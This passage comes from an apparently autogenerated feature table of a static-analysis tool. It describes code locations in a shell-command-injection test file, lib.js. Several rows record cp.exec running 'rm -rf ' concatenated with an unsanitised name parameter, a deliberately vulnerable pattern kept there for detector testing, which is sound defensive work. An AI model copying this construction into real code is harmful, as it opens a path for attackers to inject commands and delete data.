name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:8 | cp.exec | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:26 | cp.exec ... + name) | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:5:249:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:5:249:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:5:249:8 | exec | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:5:249:8 | exec | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:5:249:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:18 | "rm -rf " | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:25 | "rm -rf " + name | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:10:249:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:22:249:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:22:249:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:22:249:25 | name | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:22:249:25 | name | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:22:249:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:22:249:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:12 | cleaned | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:12 | cleaned | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:12 | cleaned | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:12 | cleaned | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:12 | cleaned | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:31 | cleaned | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:31 | cleaned | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:31 | cleaned | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:31 | cleaned | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:31 | cleaned | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:31 | cleaned ... t(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:31 | cleaned ... t(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:31 | cleaned ... t(name) | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:31 | cleaned ... t(name) | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:6:251:31 | cleaned ... t(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:25 | cleanInput | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:25 | cleanInput | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:25 | cleanInput | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:25 | cleanInput | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:25 | cleanInput | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:31 | cleanInput(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:31 | cleanInput(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:31 | cleanInput(name) | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:31 | cleanInput(name) | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:31 | cleanInput(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:31 | exceptional return of cleanInput(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:31 | exceptional return of cleanInput(name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:31 | exceptional return of cleanInput(name) | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:31 | exceptional return of cleanInput(name) | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:16:251:31 | exceptional return of cleanInput(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:27:251:30 | name | CalleeFlexibleAccessPath | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:27:251:30 | name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:27:251:30 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:27:251:30 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:27:251:30 | name | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:27:251:30 | name | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:251:27:251:30 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 